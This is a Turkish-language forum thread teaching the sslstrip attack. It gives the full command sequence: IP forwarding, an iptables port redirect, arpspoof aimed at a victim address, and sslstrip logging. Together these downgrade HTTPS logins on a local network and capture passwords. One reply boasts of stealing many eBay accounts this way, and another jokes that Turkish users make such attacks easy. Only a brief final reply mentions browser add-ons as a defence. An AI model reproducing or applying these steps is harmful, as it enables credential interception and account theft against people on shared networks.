Forum
Aktif konular
Üyeler
Kurallar
Arama
Sslstrip Sslstrip
-
sslstrip yazılımı bu yılın başlarında çıkmış network sniffing yaparken ssl şifrelerini alabilmenizi sağlayan bir yazılım..
peki bunu nasıl beceriyor ?
siz ssl ile korunan bi siteye giriş yaptığınızda sizden gizli ağı dinleyen saldırgan siteden gelen bilgiyi alıyor, siteyi ssl protokolunden çıkarıyor ve size http olarak yolluyor sizde ufak "s" harfine dikkat etmediğiniz takdirde elinizle şifrenizi saldırgana teslim ediyorsunuz..
eskiden ssl şifrelerini sahte sertifika oluşturarak dns ve arp spoofla alabiliyorduk artık sahte sertifikalar kabak gibi uyarı verdiği için şimdilik gözdemiz budur..
yapılışa geçelim..
öncelikle aldığımız paketleri yönlendirebilmemiz için unix tabanlı bi işletim sistemi kullanmanız gerekiyor..
ip forwarding için kullanacağımız komut aşağıdadır.
echo "1" > /proc/sys/net/ipv4/ip_forward
paketleri yönlendirebilmemiz için bir önemli komutta iptable ayarlarıyla ilgili onu da aşağıdaki şekilde hallediyoruz
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
bu komutlada 80. porttan aldığımız paketi dinlemek üzere 8080 portuna yönlendiriyoruz
son olarak paketleri üstümüze çekmemiz gerekiyor bunun içinde arpspoof yapıyoruz.. bunu yaparak ağdaki bilgisayarların bizi gateway olarak görüp paketleri bize yollamasını sağlıyoruz.. bunun için komutumuz
arpspoof -i eth0 -t 192.168.2.xx 192.168.2.1
eth0 interfacei gösteriyor sizde farklı olabilir.. network ayarlarından bakaiblirsiniz. ilk ip adresi kurbanın ip adresi ikincisi ise default gateway adresidir genellikle 192.168.2.1 olduğu için öyle yazdım sizde farklı olabilir yine..
buraya kadar yaptıklarımız standart bi mitm saldırısı şimdi paketleri sslstrip yazılımıyla dinlemeye alıyoruz..
sslstrip -w log --all -l 8000 –f
komutuyla gelen logları log dosyası altına kaydediyoruz eğer dosyaadı belirtmezseniz trafiği sslstrip.log dosyasına atacaktır
bu aralar üstüne düşülen bi konu olduğu için forumda dursun dedim..
-
firefoxda https'ten http'e geçerken uyarı veriyor. onu aşabiliyor mu peki ? hiç sanmıyorum ama :)
-
https e hiç geçiş yapmıyorsun ki zaten.. sorun olmaması lazım..
-
neron bunu yazdı:
----------------------------
siz ssl ile korunan bi siteye giriş yaptığınızda sizden gizli ağı dinleyen saldırgan siteden gelen bilgiyi alıyor, siteyi ssl protokolunden çıkarıyor ve size http olarak yolluyor sizde ufak "s" harfine dikkat etmediğiniz takdirde elinizle şifrenizi saldırgana teslim ediyorsunuz..
-----------------------------bu kısımdan bahsediyorum.
-
Fikret bunu yazdı:
-----------------------------
neron bunu yazdı:
----------------------------
siz ssl ile korunan bi siteye giriş yaptığınızda sizden gizli ağı dinleyen saldırgan siteden gelen bilgiyi alıyor, siteyi ssl protokolunden çıkarıyor ve size http olarak yolluyor sizde ufak "s" harfine dikkat etmediğiniz takdirde elinizle şifrenizi saldırgana teslim ediyorsunuz..
-----------------------------bu kısımdan bahsediyorum.
-----------------------------hocam karşı tarafa hiç https gitmeyeceği için uyarı vermeyecektir ... senin olay su durumda olabilir sen https://aaa.com a girersin site seni http://aaa.com a yönlendirince olur ama burda hiç https giremiyor olayın içine çok kullandığım bişey dir çok işe yarar çok ebay accountu çaldım bunla.istsec dede bahsi geçmişti hatta huzeyfe onal live bi örneğini sunmuştu zaten ebay deki ilham kaynağımda o
-
İş yine kullanıcıda bitiyor, güvenlik yazılımlarıyla bir yere kadar.
-
SpoofU bunu yazdı:
-----------------------------
İş yine kullanıcıda bitiyor, güvenlik yazılımlarıyla bir yere kadar.
-----------------------------türkiyede iş kullanıcılara kalınca işlerimiz çok kolaylaşıyo :D
-
Kendi deneyimlerime göre Türk insanı yabancılardan daha zor tuzağa düşüyor, belki biraz paranoyak olduğumuz içindir.
-
firefox kullanıcıları için forcehtpps ve noscript eklentileri ile belirlediğiniz sitelerde ssl bağlantısı yapılmadığı takdirde uyarı alabiliyorsunuz önlem olarak...
-
eline sağlık neron,
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla